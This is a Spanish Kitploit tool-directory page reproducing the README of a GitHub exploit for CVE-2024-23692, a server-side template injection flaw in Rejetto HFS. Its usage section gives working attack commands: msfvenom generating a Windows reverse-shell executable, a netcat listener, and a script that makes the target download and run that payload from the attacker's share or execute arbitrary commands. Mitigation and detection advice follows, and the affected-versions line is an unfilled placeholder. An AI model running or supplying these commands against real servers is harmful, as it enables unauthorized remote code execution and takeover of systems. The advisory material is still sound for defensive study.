Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-23692 — Rejetto HFS (HTTP File Server) es un servidor web de archivos simple que facilita el intercambio de archivos a través de una red o internet. | Kitploit
Herramientas/GitHubGitHub/mr-r00t11/cve-2024-23692
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónShellcodeExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubmr-r00t11/cve-2024-23692

CVE-2024-23692

Rejetto HFS (HTTP File Server) es un servidor web de archivos simple que facilita el intercambio de archivos a través de una red o internet.

Ver Repositorio
hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Vulnerabilidad CVE-2024-23692 en Rejetto HFS (HTTP File Server)


Resumen

Rejetto HFS (HTTP File Server) es un servidor simple de archivos web que facilita el intercambio de archivos a través de una red o internet. A pesar de su facilidad de uso y simplicidad, se ha descubierto una vulnerabilidad crítica (CVE-2024-23692), que convierte al servidor en un objetivo para atacantes.


CVE-2024-23692: Vulnerabilidad de Inyección de Plantillas del Lado del Servidor (SSTI)


Descripción

CVE-2024-23692 es una vulnerabilidad de Inyección de Plantillas del Lado del Servidor (SSTI) identificada en Rejetto HFS. Esta vulnerabilidad permite a un atacante inyectar y ejecutar plantillas maliciosas en el servidor. Si se explota, puede llevar a la ejecución remota de código, comprometiendo potencialmente todo el servidor y los datos que aloja.


Impacto

Un atacante que explote esta vulnerabilidad puede:

  • Ejecutar código arbitrario en el servidor
  • Obtener acceso no autorizado a datos sensibles
  • Comprometer la integridad y disponibilidad del servidor
  • Usar el servidor comprometido para lanzar ataques adicionales dentro de la red

Uso

Obtener una shell usando un binario malicioso creado con msfvenom.

Nota: Deja nc escuchando.

root@kitploit:~
# $ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.198.128 LPORT=1234 -f exe > exploit.exe

$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 //192.168.198.128/kali/exploit.exe

[Screenshot_1.png]

Ejecutar un comando remotamente.

root@kitploit:~
$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 systeminfo

Puede tardar aproximadamente 15 segundos en mostrar el resultado.

[Screenshot_2.png]


Versiones afectadas

Todas las versiones de Rejetto HFS hasta e incluyendo la versión [insertar la última versión vulnerable aquí] están afectadas por esta vulnerabilidad.


Mitigación

Para mitigar el riesgo que plantea CVE-2024-23692, se recomienda a los usuarios:

  • Actualizar a la última versión: Asegúrate de usar una versión de Rejetto HFS donde esta vulnerabilidad haya sido parcheada. Verifica el sitio web oficial de Rejetto HFS o su repositorio para las últimas actualizaciones.
  • Aplicar las mejores prácticas de seguridad: Restringe el acceso al servidor HFS solo a redes y usuarios de confianza. Utiliza mecanismos sólidos de autenticación y autorización.
  • Monitorear y auditar: Supervisa regularmente el servidor en busca de actividad inusual y audita los registros para detectar signos de explotación.

Detección

Para determinar si tu servidor ha sido comprometido, busca:

  • Tráfico de red inusual que se origine desde el servidor
  • Archivos o procesos inesperados en el servidor
  • Cambios no autorizados en las configuraciones o datos del servidor

Reporte y Asistencia

Para obtener más asistencia y soporte, consulta los foros de la comunidad de Rejetto HFS o los canales oficiales de soporte.


Recursos

  • Sitio web oficial de Rejetto HFS
  • Detalles de CVE-2024-23692

Licencia

Este proyecto está bajo la licencia MIT - consulta el archivo LICENSE para más detalles.


Descargar herramienta